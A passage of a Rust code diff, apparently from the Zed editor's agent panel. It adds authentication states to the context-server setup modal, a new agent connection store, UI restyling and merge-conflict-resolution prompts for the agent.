.map(|kb| kb.size(rems_from_px(12.))),
@@ -789,29 +891,62 @@ impl ConfigureContextServerModal {
)
}
- fn render_waiting_for_context_server() -> Div {
+ fn render_loading(&self, label: impl Into<SharedString>) -> Div {
h_flex()
- .gap_2()
+ .h_8()
+ .gap_1p5()
+ .justify_center()
.child(
- Icon::new(IconName::ArrowCircle)
+ Icon::new(IconName::LoadCircle)
.size(IconSize::XSmall)
- .color(Color::Info)
- .with_rotate_animation(2)
- .into_any_element(),
+ .color(Color::Muted)
+ .with_rotate_animation(3),
)
+ .child(Label::new(label).size(LabelSize::Small).color(Color::Muted))
+ }
+
+ fn render_auth_required(&self, server_id: &ContextServerId, cx: &mut Context<Self>) -> Div {
+ h_flex()
+ .h_8()
+ .min_w_0()
+ .w_full()
+ .gap_2()
+ .justify_center()
.child(
- Label::new("Waiting for Context Server")
- .size(LabelSize::Small)
- .color(Color::Muted),
+ h_flex()
+ .gap_1p5()
+ .child(
+ Icon::new(IconName::Info)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
+ .child(
+ Label::new("Authenticate to connect this server")
+ .size(LabelSize::Small)
+ .color(Color::Muted),
+ ),
+ )
+ .child(
+ Button::new("authenticate-server", "Authenticate")
+ .style(ButtonStyle::Outlined)
+ .label_size(LabelSize::Small)
+ .on_click({
+ let server_id = server_id.clone();
+ cx.listener(move |this, _event, _window, cx| {
+ this.authenticate(server_id.clone(), cx);
+ })
+ }),
)
}
fn render_modal_error(error: SharedString) -> Div {
h_flex()
- .gap_2()
+ .h_8()
+ .gap_1p5()
+ .justify_center()
.child(
Icon::new(IconName::Warning)
- .size(IconSize::XSmall)
+ .size(IconSize::Small)
.color(Color::Warning),
)
.child(
@@ -826,7 +961,7 @@ impl Render for ConfigureContextServerModal {
fn render(&mut self, window: &mut Window, cx: &mut Context<Self>) -> impl IntoElement {
div()
.elevation_3(cx)
- .w(rems(34.))
+ .w(rems(40.))
.key_context("ConfigureContextServerModal")
.on_action(
cx.listener(|this, _: &menu::Cancel, _window, cx| this.cancel(&menu::Cancel, cx)),
@@ -853,11 +988,18 @@ impl Render for ConfigureContextServerModal {
.overflow_y_scroll()
.track_scroll(&self.scroll_handle)
.child(self.render_modal_description(window, cx))
+ .children(self.render_tab_bar(cx))
.child(self.render_modal_content(cx))
.child(match &self.state {
State::Idle => div(),
State::Waiting => {
- Self::render_waiting_for_context_server()
+ self.render_loading("Connecting Server…")
+ }
+ State::AuthRequired { server_id } => {
+ self.render_auth_required(&server_id.clone(), cx)
+ }
+ State::Authenticating { .. } => {
+ self.render_loading("Authenticating…")
}
State::Error(error) => {
Self::render_modal_error(error.clone())
@@ -876,7 +1018,7 @@ fn wait_for_context_server(
context_server_store: &Entity<ContextServerStore>,
context_server_id: ContextServerId,
cx: &mut App,
-) -> Task<Result<(), Arc<str>>> {
+) -> Task<Result<ContextServerStatus, Arc<str>>> {
use std::time::Duration;
const WAIT_TIMEOUT: Duration = Duration::from_secs(120);
@@ -886,31 +1028,29 @@ fn wait_for_context_server(
let context_server_id_for_timeout = context_server_id.clone();
let subscription = cx.subscribe(context_server_store, move |_, event, _cx| {
- let project::context_server_store::ServerStatusChangedEvent { server_id, status } = event;
+ let ServerStatusChangedEvent { server_id, status } = event;
+
+ if server_id != &context_server_id {
+ return;
+ }
match status {
- ContextServerStatus::Running => {
- if server_id == &context_server_id
- && let Some(tx) = tx.lock().unwrap().take()
- {
- let _ = tx.send(Ok(()));
+ ContextServerStatus::Running | ContextServerStatus::AuthRequired => {
+ if let Some(tx) = tx.lock().take() {
+ let _ = tx.send(Ok(status.clone()));
}
}
ContextServerStatus::Stopped => {
- if server_id == &context_server_id
- && let Some(tx) = tx.lock().unwrap().take()
- {
+ if let Some(tx) = tx.lock().take() {
let _ = tx.send(Err("Context server stopped running".into()));
}
}
ContextServerStatus::Error(error) => {
- if server_id == &context_server_id
- && let Some(tx) = tx.lock().unwrap().take()
- {
+ if let Some(tx) = tx.lock().take() {
let _ = tx.send(Err(error.clone()));
}
}
- _ => {}
+ ContextServerStatus::Starting | ContextServerStatus::Authenticating => {}
}
});
@@ -0,0 +1,181 @@
+use std::rc::Rc;
+
+use acp_thread::{AgentConnection, LoadError};
+use agent_servers::{AgentServer, AgentServerDelegate};
+use anyhow::Result;
+use collections::HashMap;
+use futures::{FutureExt, future::Shared};
+use gpui::{AppContext, Context, Entity, EventEmitter, SharedString, Subscription, Task};
+use project::{AgentServerStore, AgentServersUpdated, Project};
+use watch::Receiver;
+
+use crate::{Agent, ThreadHistory};
+
+pub enum AgentConnectionEntry {
+ Connecting {
+ connect_task: Shared<Task<Result<AgentConnectedState, LoadError>>>,
+ },
+ Connected(AgentConnectedState),
+ Error {
+ error: LoadError,
+ },
+}
+
+#[derive(Clone)]
+pub struct AgentConnectedState {
+ pub connection: Rc<dyn AgentConnection>,
+ pub history: Option<Entity<ThreadHistory>>,
+}
+
+impl AgentConnectionEntry {
+ pub fn wait_for_connection(&self) -> Shared<Task<Result<AgentConnectedState, LoadError>>> {
+ match self {
+ AgentConnectionEntry::Connecting { connect_task } => connect_task.clone(),
+ AgentConnectionEntry::Connected(state) => Task::ready(Ok(state.clone())).shared(),
+ AgentConnectionEntry::Error { error } => Task::ready(Err(error.clone())).shared(),
+ }
+ }
+
+ pub fn history(&self) -> Option<&Entity<ThreadHistory>> {
+ match self {
+ AgentConnectionEntry::Connected(state) => state.history.as_ref(),
+ _ => None,
+ }
+ }
+}
+
+pub enum AgentConnectionEntryEvent {
+ NewVersionAvailable(SharedString),
+}
+
+impl EventEmitter<AgentConnectionEntryEvent> for AgentConnectionEntry {}
+
+pub struct AgentConnectionStore {
+ project: Entity<Project>,
+ entries: HashMap<Agent, Entity<AgentConnectionEntry>>,
+ _subscriptions: Vec<Subscription>,
+}
+
+impl AgentConnectionStore {
+ pub fn new(project: Entity<Project>, cx: &mut Context<Self>) -> Self {
+ let agent_server_store = project.read(cx).agent_server_store().clone();
+ let subscription = cx.subscribe(&agent_server_store, Self::handle_agent_servers_updated);
+ Self {
+ project,
+ entries: HashMap::default(),
+ _subscriptions: vec![subscription],
+ }
+ }
+
+ pub fn entry(&self, key: &Agent) -> Option<&Entity<AgentConnectionEntry>> {
+ self.entries.get(key)
+ }
+
+ pub fn request_connection(
+ &mut self,
+ key: Agent,
+ server: Rc<dyn AgentServer>,
+ cx: &mut Context<Self>,
+ ) -> Entity<AgentConnectionEntry> {
+ self.entries.get(&key).cloned().unwrap_or_else(|| {
+ let (mut new_version_rx, connect_task) = self.start_connection(server.clone(), cx);
+ let connect_task = connect_task.shared();
+
+ let entry = cx.new(|_cx| AgentConnectionEntry::Connecting {
+ connect_task: connect_task.clone(),
+ });
+
+ self.entries.insert(key.clone(), entry.clone());
+
+ cx.spawn({
+ let key = key.clone();
+ let entry = entry.clone();
+ async move |this, cx| match connect_task.await {
+ Ok(connected_state) => {
+ entry.update(cx, |entry, cx| {
+ if let AgentConnectionEntry::Connecting { .. } = entry {
+ *entry = AgentConnectionEntry::Connected(connected_state);
+ cx.notify();
+ }
+ });
+ }
+ Err(error) => {
+ entry.update(cx, |entry, cx| {
+ if let AgentConnectionEntry::Connecting { .. } = entry {
+ *entry = AgentConnectionEntry::Error { error };
+ cx.notify();
+ }
+ });
+ this.update(cx, |this, _cx| this.entries.remove(&key)).ok();
+ }
+ }
+ })
+ .detach();
+
+ cx.spawn({
+ let entry = entry.clone();
+ async move |this, cx| {
+ while let Ok(version) = new_version_rx.recv().await {
+ if let Some(version) = version {
+ entry.update(cx, |_entry, cx| {
+ cx.emit(AgentConnectionEntryEvent::NewVersionAvailable(
+ version.clone().into(),
+ ));
+ });
+ this.update(cx, |this, _cx| this.entries.remove(&key)).ok();
+ }
+ }
+ }
+ })
+ .detach();
+
+ entry
+ })
+ }
+
+ fn handle_agent_servers_updated(
+ &mut self,
+ store: Entity<AgentServerStore>,
+ _: &AgentServersUpdated,
+ cx: &mut Context<Self>,
+ ) {
+ let store = store.read(cx);
+ self.entries.retain(|key, _| match key {
+ Agent::NativeAgent => true,
+ Agent::Custom { id } => store.external_agents.contains_key(id),
+ });
+ cx.notify();
+ }
+
+ fn start_connection(
+ &self,
+ server: Rc<dyn AgentServer>,
+ cx: &mut Context<Self>,
+ ) -> (
+ Receiver<Option<String>>,
+ Task<Result<AgentConnectedState, LoadError>>,
+ ) {
+ let (new_version_tx, new_version_rx) = watch::channel::<Option<String>>(None);
+
+ let agent_server_store = self.project.read(cx).agent_server_store().clone();
+ let delegate = AgentServerDelegate::new(agent_server_store, Some(new_version_tx));
+
+ let connect_task = server.connect(delegate, self.project.clone(), cx);
+ let connect_task = cx.spawn(async move |_this, cx| match connect_task.await {
+ Ok(connection) => cx.update(|cx| {
+ let history = connection
+ .session_list(cx)
+ .map(|session_list| cx.new(|cx| ThreadHistory::new(session_list, cx)));
+ Ok(AgentConnectedState {
+ connection,
+ history,
+ })
+ }),
+ Err(err) => match err.downcast::<LoadError>() {
+ Ok(load_error) => Err(load_error),
+ Err(err) => Err(LoadError::Other(SharedString::from(err.to_string()))),
+ },
+ });
+ (new_version_rx, connect_task)
+ }
+}
@@ -44,7 +44,6 @@ pub struct AgentDiffPane {
thread: Entity<AcpThread>,
focus_handle: FocusHandle,
workspace: WeakEntity<Workspace>,
- title: SharedString,
_subscriptions: Vec<Subscription>,
}
@@ -113,7 +112,6 @@ impl AgentDiffPane {
this.handle_acp_thread_event(event, cx)
}),
],
- title: SharedString::default(),
multibuffer,
editor,
thread,
@@ -121,7 +119,6 @@ impl AgentDiffPane {
workspace,
};
this.update_excerpts(window, cx);
- this.update_title(cx);
this
}
@@ -231,17 +228,9 @@ impl AgentDiffPane {
}
}
- fn update_title(&mut self, cx: &mut Context<Self>) {
- let new_title = self.thread.read(cx).title();
- if new_title != self.title {
- self.title = new_title;
- cx.emit(EditorEvent::TitleChanged);
- }
- }
-
fn handle_acp_thread_event(&mut self, event: &AcpThreadEvent, cx: &mut Context<Self>) {
if let AcpThreadEvent::TitleUpdated = event {
- self.update_title(cx)
+ cx.emit(EditorEvent::TitleChanged);
}
}
@@ -534,13 +523,17 @@ impl Item for AgentDiffPane {
fn tab_content(&self, params: TabContentParams, _window: &Window, cx: &App) -> AnyElement {
let title = self.thread.read(cx).title();
- Label::new(format!("Review: {}", title))
- .color(if params.selected {
- Color::Default
- } else {
- Color::Muted
- })
- .into_any_element()
+ Label::new(if let Some(title) = title {
+ format!("Review: {}", title)
+ } else {
+ "Review".to_string()
+ })
+ .color(if params.selected {
+ Color::Default
+ } else {
+ Color::Muted
+ })
+ .into_any_element()
}
fn telemetry_event_text(&self) -> Option<&'static str> {
@@ -686,10 +679,11 @@ impl Render for AgentDiffPane {
.child(
Button::new("continue-iterating", "Continue Iterating")
.style(ButtonStyle::Filled)
- .icon(IconName::ForwardArrow)
- .icon_position(IconPosition::Start)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted)
+ .start_icon(
+ Icon::new(IconName::ForwardArrow)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.full_width()
.key_binding(KeyBinding::for_action_in(
&ToggleFocus,
@@ -1804,7 +1798,7 @@ mod tests {
use settings::SettingsStore;
use std::{path::Path, rc::Rc};
use util::path;
- use workspace::MultiWorkspace;
+ use workspace::{MultiWorkspace, PathList};
#[gpui::test]
async fn test_multibuffer_agent_diff(cx: &mut TestAppContext) {
@@ -1832,9 +1826,11 @@ mod tests {
let connection = Rc::new(acp_thread::StubAgentConnection::new());
let thread = cx
.update(|cx| {
- connection
- .clone()
- .new_session(project.clone(), Path::new(path!("/test")), cx)
+ connection.clone().new_session(
+ project.clone(),
+ PathList::new(&[Path::new(path!("/test"))]),
+ cx,
+ )
})
.await
.unwrap();
@@ -2023,9 +2019,11 @@ mod tests {
let connection = Rc::new(acp_thread::StubAgentConnection::new());
let thread = cx
.update(|_, cx| {
- connection
- .clone()
- .new_session(project.clone(), Path::new(path!("/test")), cx)
+ connection.clone().new_session(
+ project.clone(),
+ PathList::new(&[Path::new(path!("/test"))]),
+ cx,
+ )
})
.await
.unwrap();
@@ -9,7 +9,7 @@ use language_model::IconOrSvg;
use picker::popover_menu::PickerPopoverMenu;
use settings::update_settings_file;
use std::sync::Arc;
-use ui::{ButtonLike, PopoverMenuHandle, TintColor, Tooltip, prelude::*};
+use ui::{PopoverMenuHandle, Tooltip, prelude::*};
pub struct AgentModelSelector {
selector: Entity<LanguageModelSelector>,
@@ -112,9 +112,11 @@ impl Render for AgentModelSelector {
PickerPopoverMenu::new(
self.selector.clone(),
- ButtonLike::new("active-model")
+ Button::new("active-model", model_name)
+ .label_size(LabelSize::Small)
+ .color(color)
.when_some(provider_icon, |this, icon| {
- this.child(
+ this.start_icon(
match icon {
IconOrSvg::Svg(path) => Icon::from_external_svg(path),
IconOrSvg::Icon(name) => Icon::new(name),
@@ -123,14 +125,7 @@ impl Render for AgentModelSelector {
.size(IconSize::XSmall),
)
})
- .selected_style(ButtonStyle::Tinted(TintColor::Accent))
- .child(
- Label::new(model_name)
- .color(color)
- .size(LabelSize::Small)
- .ml_0p5(),
- )
- .child(
+ .end_icon(
Icon::new(IconName::ChevronDown)
.color(color)
.size(IconSize::XSmall),
@@ -13,42 +13,47 @@ use acp_thread::{AcpThread, MentionUri, ThreadStatus};
use agent::{ContextServerRegistry, SharedThread, ThreadStore};
use agent_client_protocol as acp;
use agent_servers::AgentServer;
-use db::kvp::{Dismissable, KEY_VALUE_STORE};
+use collections::HashSet;
+use db::kvp::{Dismissable, KeyValueStore};
use itertools::Itertools;
-use project::{
- ExternalAgentServerName,
- agent_server_store::{CLAUDE_AGENT_NAME, CODEX_NAME, GEMINI_NAME},
-};
+use project::AgentId;
use serde::{Deserialize, Serialize};
use settings::{LanguageModelProviderSetting, LanguageModelSelection};
use feature_flags::{AgentV2FeatureFlag, FeatureFlagAppExt as _};
-use zed_actions::agent::{OpenClaudeAgentOnboardingModal, ReauthenticateAgent, ReviewBranchDiff};
+use zed_actions::agent::{
+ ConflictContent, OpenClaudeAgentOnboardingModal, ReauthenticateAgent,
+ ResolveConflictedFilesWithAgent, ResolveConflictsWithAgent, ReviewBranchDiff,
+};
-use crate::ManageProfiles;
-use crate::ui::{AcpOnboardingModal, ClaudeCodeOnboardingModal};
use crate::{
- AddContextServer, AgentDiffPane, ConnectionView, CopyThreadToClipboard, Follow,
- InlineAssistant, LoadThreadFromClipboard, NewTextThread, NewThread, OpenActiveThreadAsMarkdown,
- OpenAgentDiff, OpenHistory, ResetTrialEndUpsell, ResetTrialUpsell, StartThreadIn,
- ToggleNavigationMenu, ToggleNewThreadMenu, ToggleOptionsMenu, ToggleStartThreadInSelector,
+ AddContextServer, AgentDiffPane, ConversationView, CopyThreadToClipboard, CycleStartThreadIn,
+ Follow, InlineAssistant, LoadThreadFromClipboard, NewTextThread, NewThread,
+ OpenActiveThreadAsMarkdown, OpenAgentDiff, OpenHistory, ResetTrialEndUpsell, ResetTrialUpsell,
+ StartThreadIn, ToggleNavigationMenu, ToggleNewThreadMenu, ToggleOptionsMenu,
agent_configuration::{AgentConfiguration, AssistantConfigurationEvent},
- connection_view::{AcpThreadViewEvent, ThreadView},
+ conversation_view::{AcpThreadViewEvent, ThreadView},
slash_command::SlashCommandCompletionProvider,
text_thread_editor::{AgentPanelDelegate, TextThreadEditor, make_lsp_adapter_delegate},
ui::EndTrialUpsell,
};
use crate::{
- AgentInitialContent, ExternalAgent, ExternalSourcePrompt, NewExternalAgentThread,
+ Agent, AgentInitialContent, ExternalSourcePrompt, NewExternalAgentThread,
NewNativeAgentThreadFromSummary,
};
use crate::{
- ExpandMessageEditor, ThreadHistory, ThreadHistoryEvent,
+ DEFAULT_THREAD_TITLE,
+ ui::{AcpOnboardingModal, ClaudeCodeOnboardingModal, HoldForDefault},
+};
+use crate::{
+ ExpandMessageEditor, ThreadHistoryView,
text_thread_history::{TextThreadHistory, TextThreadHistoryEvent},
};
+use crate::{ManageProfiles, ThreadHistoryViewEvent};
+use crate::{ThreadHistory, agent_connection_store::AgentConnectionStore};
use agent_settings::AgentSettings;
use ai_onboarding::AgentPanelOnboarding;
-use anyhow::{Result, anyhow};
+use anyhow::{Context as _, Result, anyhow};
use assistant_slash_command::SlashCommandWorkingSet;
use assistant_text_thread::{TextThread, TextThreadEvent, TextThreadSummary};
use client::UserStore;
@@ -58,7 +63,6 @@ use editor::{Anchor, AnchorRangeExt as _, Editor, EditorEvent, MultiBuffer};
use extension::ExtensionEvents;
use extension_host::ExtensionStore;
use fs::Fs;
-use git::repository::validate_worktree_directory;
use gpui::{
Action, Animation, AnimationExt, AnyElement, App, AsyncWindowContext, ClipboardItem, Corner,
DismissEvent, Entity, EventEmitter, ExternalPaths, FocusHandle, Focusable, KeyContext, Pixels,
@@ -74,14 +78,13 @@ use search::{BufferSearchBar, buffer_search};
use settings::{Settings, update_settings_file};
use theme::ThemeSettings;
use ui::{
- Button, ButtonLike, Callout, ContextMenu, ContextMenuEntry, DocumentationSide, KeyBinding,
- PopoverMenu, PopoverMenuHandle, SpinnerLabel, Tab, TintColor, Tooltip, prelude::*,
- utils::WithRemSize,
+ Button, Callout, CommonAnimationExt, ContextMenu, ContextMenuEntry, DocumentationSide,
+ KeyBinding, PopoverMenu, PopoverMenuHandle, Tab, Tooltip, prelude::*, utils::WithRemSize,
};
-use util::ResultExt as _;
+use util::{ResultExt as _, debug_panic};
use workspace::{
- CollaboratorId, DraggedSelection, DraggedTab, ToggleZoom, ToolbarItemView, Workspace,
- WorkspaceId,
+ CollaboratorId, DraggedSelection, DraggedTab, OpenResult, PathList, SerializedPathList,
+ ToggleWorkspaceSidebar, ToggleZoom, ToolbarItemView, Workspace, WorkspaceId,
dock::{DockPosition, Panel, PanelEvent},
};
use zed_actions::{
@@ -92,10 +95,12 @@ use zed_actions::{
const AGENT_PANEL_KEY: &str = "agent_panel";
const RECENTLY_UPDATED_MENU_LIMIT: usize = 6;
-const DEFAULT_THREAD_TITLE: &str = "New Thread";
-fn read_serialized_panel(workspace_id: workspace::WorkspaceId) -> Option<SerializedAgentPanel> {
- let scope = KEY_VALUE_STORE.scoped(AGENT_PANEL_KEY);
+fn read_serialized_panel(
+ workspace_id: workspace::WorkspaceId,
+ kvp: &KeyValueStore,
+) -> Option<SerializedAgentPanel> {
+ let scope = kvp.scoped(AGENT_PANEL_KEY);
let key = i64::from(workspace_id).to_string();
scope
.read(&key)
@@ -107,8 +112,9 @@ fn read_serialized_panel(workspace_id: workspace::WorkspaceId) -> Option<Seriali
async fn save_serialized_panel(
workspace_id: workspace::WorkspaceId,
panel: SerializedAgentPanel,
+ kvp: KeyValueStore,
) -> Result<()> {
- let scope = KEY_VALUE_STORE.scoped(AGENT_PANEL_KEY);
+ let scope = kvp.scoped(AGENT_PANEL_KEY);
let key = i64::from(workspace_id).to_string();
scope.write(key, serde_json::to_string(&panel)?).await?;
Ok(())
@@ -116,15 +122,14 @@ async fn save_serialized_panel(
/// Migration: reads the original single-panel format stored under the
/// `"agent_panel"` KVP key before per-workspace keying was introduced.
-fn read_legacy_serialized_panel() -> Option<SerializedAgentPanel> {
- KEY_VALUE_STORE
- .read_kvp(AGENT_PANEL_KEY)
+fn read_legacy_serialized_panel(kvp: &KeyValueStore) -> Option<SerializedAgentPanel> {
+ kvp.read_kvp(AGENT_PANEL_KEY)
.log_err()
.flatten()
.and_then(|json| serde_json::from_str::<SerializedAgentPanel>(&json).log_err())
}
-#[derive(Serialize, Deserialize, Debug, Clone)]
+#[derive(Serialize, Deserialize, Debug)]
struct SerializedAgentPanel {
width: Option<Pixels>,
selected_agent: Option<AgentType>,
@@ -134,12 +139,12 @@ struct SerializedAgentPanel {
start_thread_in: Option<StartThreadIn>,
}
-#[derive(Serialize, Deserialize, Debug, Clone)]
+#[derive(Serialize, Deserialize, Debug)]
struct SerializedActiveThread {
session_id: String,
agent_type: AgentType,
title: Option<String>,
- cwd: Option<std::path::PathBuf>,
+ work_dirs: Option<SerializedPathList>,
}
pub fn init(cx: &mut App) {
@@ -219,9 +224,9 @@ pub fn init(cx: &mut App) {
.register_action(|workspace, _: &OpenAgentDiff, window, cx| {
let thread = workspace
.panel::<AgentPanel>(cx)
- .and_then(|panel| panel.read(cx).active_connection_view().cloned())
- .and_then(|thread_view| {
- thread_view
+ .and_then(|panel| panel.read(cx).active_conversation_view().cloned())
+ .and_then(|conversation| {
+ conversation
.read(cx)
.active_thread()
.map(|r| r.read(cx).thread.clone())
@@ -255,18 +260,6 @@ pub fn init(cx: &mut App) {
});
}
})
- .register_action(|workspace, _: &ToggleStartThreadInSelector, window, cx| {
- if let Some(panel) = workspace.panel::<AgentPanel>(cx) {
- workspace.focus_panel::<AgentPanel>(window, cx);
- panel.update(cx, |panel, cx| {
- panel.toggle_start_thread_in_selector(
- &ToggleStartThreadInSelector,
- window,
- cx,
- );
- });
- }
- })
.register_action(|workspace, _: &OpenAcpOnboardingModal, window, cx| {
AcpOnboardingModal::toggle(workspace, window, cx)
})
@@ -358,10 +351,72 @@ pub fn init(cx: &mut App) {
);
});
})
- .register_action(|workspace, action: &StartThreadIn, _window, cx| {
+ .register_action(
+ |workspace, action: &ResolveConflictsWithAgent, window, cx| {
+ let Some(panel) = workspace.panel::<AgentPanel>(cx) else {
+ return;
+ };
+
+ let content_blocks = build_conflict_resolution_prompt(&action.conflicts);
+
+ workspace.focus_panel::<AgentPanel>(window, cx);
+
+ panel.update(cx, |panel, cx| {
+ panel.external_thread(
+ None,
+ None,
+ None,
+ None,
+ Some(AgentInitialContent::ContentBlock {
+ blocks: content_blocks,
+ auto_submit: true,
+ }),
+ true,
+ window,
+ cx,
+ );
+ });
+ },
+ )
+ .register_action(
+ |workspace, action: &ResolveConflictedFilesWithAgent, window, cx| {
+ let Some(panel) = workspace.panel::<AgentPanel>(cx) else {
+ return;
+ };
+
+ let content_blocks =
+ build_conflicted_files_resolution_prompt(&action.conflicted_file_paths);
+
+ workspace.focus_panel::<AgentPanel>(window, cx);
+
+ panel.update(cx, |panel, cx| {
+ panel.external_thread(
+ None,
+ None,
+ None,
+ None,
+ Some(AgentInitialContent::ContentBlock {
+ blocks: content_blocks,
+ auto_submit: true,
+ }),
+ true,
+ window,
+ cx,
+ );
+ });
+ },
+ )
+ .register_action(|workspace, action: &StartThreadIn, window, cx| {
+ if let Some(panel) = workspace.panel::<AgentPanel>(cx) {
+ panel.update(cx, |panel, cx| {
+ panel.set_start_thread_in(action, window, cx);
+ });
+ }
+ })
+ .register_action(|workspace, _: &CycleStartThreadIn, window, cx| {
if let Some(panel) = workspace.panel::<AgentPanel>(cx) {
panel.update(cx, |panel, cx| {
- panel.set_start_thread_in(action, cx);
+ panel.cycle_start_thread_in(window, cx);
});
}
});
@@ -370,16 +425,123 @@ pub fn init(cx: &mut App) {
.detach();
}
-#[derive(Clone, Copy, Debug, PartialEq, Eq)]
-enum HistoryKind {
- AgentThreads,
+fn conflict_resource_block(conflict: &ConflictContent) -> acp::ContentBlock {
+ let mention_uri = MentionUri::MergeConflict {
+ file_path: conflict.file_path.clone(),
+ };
+ acp::ContentBlock::Resource(acp::EmbeddedResource::new(
+ acp::EmbeddedResourceResource::TextResourceContents(acp::TextResourceContents::new(
+ conflict.conflict_text.clone(),
+ mention_uri.to_uri().to_string(),
+ )),
+ ))
+}
+
+fn build_conflict_resolution_prompt(conflicts: &[ConflictContent]) -> Vec<acp::ContentBlock> {
+ if conflicts.is_empty() {
+ return Vec::new();
+ }
+
+ let mut blocks = Vec::new();
+
+ if conflicts.len() == 1 {
+ let conflict = &conflicts[0];
+
+ blocks.push(acp::ContentBlock::Text(acp::TextContent::new(
+ "Please resolve the following merge conflict in ",
+ )));
+ let mention = MentionUri::File {
+ abs_path: PathBuf::from(conflict.file_path.clone()),
+ };
+ blocks.push(acp::ContentBlock::ResourceLink(acp::ResourceLink::new(
+ mention.name(),
+ mention.to_uri(),
+ )));
+
+ blocks.push(acp::ContentBlock::Text(acp::TextContent::new(
+ indoc::formatdoc!(
+ "\nThe conflict is between branch `{ours}` (ours) and `{theirs}` (theirs).
+
+ Analyze both versions carefully and resolve the conflict by editing \
+ the file directly. Choose the resolution that best preserves the intent \
+ of both changes, or combine them if appropriate.
+
+ ",
+ ours = conflict.ours_branch_name,
+ theirs = conflict.theirs_branch_name,
+ ),
+ )));
+ } else {
+ let n = conflicts.len();
+ let unique_files: HashSet<&str> = conflicts.iter().map(|c| c.file_path.as_str()).collect();
+ let ours = &conflicts[0].ours_branch_name;
+ let theirs = &conflicts[0].theirs_branch_name;
+ blocks.push(acp::ContentBlock::Text(acp::TextContent::new(
+ indoc::formatdoc!(
+ "Please resolve all {n} merge conflicts below.
+
+ The conflicts are between branch `{ours}` (ours) and `{theirs}` (theirs).
+
+ For each conflict, analyze both versions carefully and resolve them \
+ by editing the file{suffix} directly. Choose resolutions that best preserve \
+ the intent of both changes, or combine them if appropriate.
+
+ ",
+ suffix = if unique_files.len() > 1 { "s" } else { "" },
+ ),
+ )));
+ }
+
+ for conflict in conflicts {
+ blocks.push(conflict_resource_block(conflict));
+ }
+
+ blocks
+}
+
+fn build_conflicted_files_resolution_prompt(
+ conflicted_file_paths: &[String],
+) -> Vec<acp::ContentBlock> {
+ if conflicted_file_paths.is_empty() {
+ return Vec::new();
+ }
+
+ let instruction = indoc::indoc!(
+ "The following files have unresolved merge conflicts. Please open each \
+ file, find the conflict markers (`<<<<<<<` / `=======` / `>>>>>>>`), \
+ and resolve every conflict by editing the files directly.
+
+ Choose resolutions that best preserve the intent of both changes, \
+ or combine them if appropriate.
+
+ Files with conflicts:
+ ",
+ );
+
+ let mut content = vec![acp::ContentBlock::Text(acp::TextContent::new(instruction))];
+ for path in conflicted_file_paths {
+ let mention = MentionUri::File {
+ abs_path: PathBuf::from(path),
+ };
+ content.push(acp::ContentBlock::ResourceLink(acp::ResourceLink::new(
+ mention.name(),
+ mention.to_uri(),
+ )));
+ content.push(acp::ContentBlock::Text(acp::TextContent::new("\n")));
+ }
+ content
+}
+
+#[derive(Clone, Debug, PartialEq, Eq)]
+enum History {
+ AgentThreads { view: Entity<ThreadHistoryView> },
TextThreads,
}
enum ActiveView {
Uninitialized,
AgentThread {
- server_view: Entity<ConnectionView>,
+ conversation_view: Entity<ConversationView>,
},
TextThread {
text_thread_editor: Entity<TextThreadEditor>,
@@ -388,7 +550,7 @@ enum ActiveView {
_subscriptions: Vec<gpui::Subscription>,
},
History {
- kind: HistoryKind,
+ history: History,
},
Configuration,
}
@@ -400,73 +562,17 @@ enum WhichFontSize {
}
// TODO unify this with ExternalAgent
-#[derive(Debug, Default, Clone, PartialEq, Serialize)]
+#[derive(Debug, Default, Clone, PartialEq, Serialize, Deserialize)]
pub enum AgentType {
#[default]
NativeAgent,
TextThread,
Custom {
- name: SharedString,
+ #[serde(rename = "name")]
+ id: AgentId,
},
}
-// Custom impl handles legacy variant names from before the built-in agents were moved to
-// the registry: "ClaudeAgent" -> Custom { name: "claude-acp" }, "Codex" -> Custom { name:
-// "codex-acp" }, "Gemini" -> Custom { name: "gemini" }.
-// Can be removed at some point in the future and go back to #[derive(Deserialize)].
-impl<'de> Deserialize<'de> for AgentType {
- fn deserialize<D>(deserializer: D) -> Result<Self, D::Error>
- where
- D: serde::Deserializer<'de>,
- {
- let value = serde_json::Value::deserialize(deserializer)?;
-
- if let Some(s) = value.as_str() {
- return match s {
- "NativeAgent" => Ok(Self::NativeAgent),
- "TextThread" => Ok(Self::TextThread),
- "ClaudeAgent" | "ClaudeCode" => Ok(Self::Custom {
- name: CLAUDE_AGENT_NAME.into(),
- }),
- "Codex" => Ok(Self::Custom {
- name: CODEX_NAME.into(),
- }),
- "Gemini" => Ok(Self::Custom {
- name: GEMINI_NAME.into(),
- }),
- other => Err(serde::de::Error::unknown_variant(
- other,
- &[
- "NativeAgent",
- "TextThread",
- "Custom",
- "ClaudeAgent",
- "ClaudeCode",
- "Codex",
- "Gemini",
- ],
- )),
- };
- }
-
- if let Some(obj) = value.as_object() {
- if let Some(inner) = obj.get("Custom") {
- #[derive(Deserialize)]
- struct CustomFields {
- name: SharedString,
- }
- let fields: CustomFields =
- serde_json::from_value(inner.clone()).map_err(serde::de::Error::custom)?;
- return Ok(Self::Custom { name: fields.name });
- }
- }
-
- Err(serde::de::Error::custom(
- "expected a string variant or {\"Custom\": {\"name\": ...}}",
- ))
- }
-}
-
impl AgentType {
pub fn is_native(&self) -> bool {
matches!(self, Self::NativeAgent)
@@ -475,7 +581,7 @@ impl AgentType {
fn label(&self) -> SharedString {
match self {
Self::NativeAgent | Self::TextThread => "Zed Agent".into(),
- Self::Custom { name, .. } => name.into(),
+ Self::Custom { id, .. } => id.0.clone(),
}
}
@@ -487,11 +593,11 @@ impl AgentType {
}
}
-impl From<ExternalAgent> for AgentType {
- fn from(value: ExternalAgent) -> Self {
+impl From<Agent> for AgentType {
+ fn from(value: Agent) -> Self {
match value {
- ExternalAgent::Custom { name } => Self::Custom { name },
- ExternalAgent::NativeAgent => Self::NativeAgent,
+ Agent::Custom { id } => Self::Custom { id },
+ Agent::NativeAgent => Self::NativeAgent,
}
}
}
@@ -499,8 +605,8 @@ impl From<ExternalAgent> for AgentType {
impl StartThreadIn {
fn label(&self) -> SharedString {
match self {
- Self::LocalProject => "Current Project".into(),
- Self::NewWorktree => "New Worktree".into(),
+ Self::LocalProject => "Current Worktree".into(),
+ Self::NewWorktree => "New Git Worktree".into(),
}
}
}
@@ -619,18 +725,18 @@ pub struct AgentPanel {
project: Entity<Project>,
fs: Arc<dyn Fs>,
language_registry: Arc<LanguageRegistry>,
- acp_history: Entity<ThreadHistory>,
text_thread_history: Entity<TextThreadHistory>,
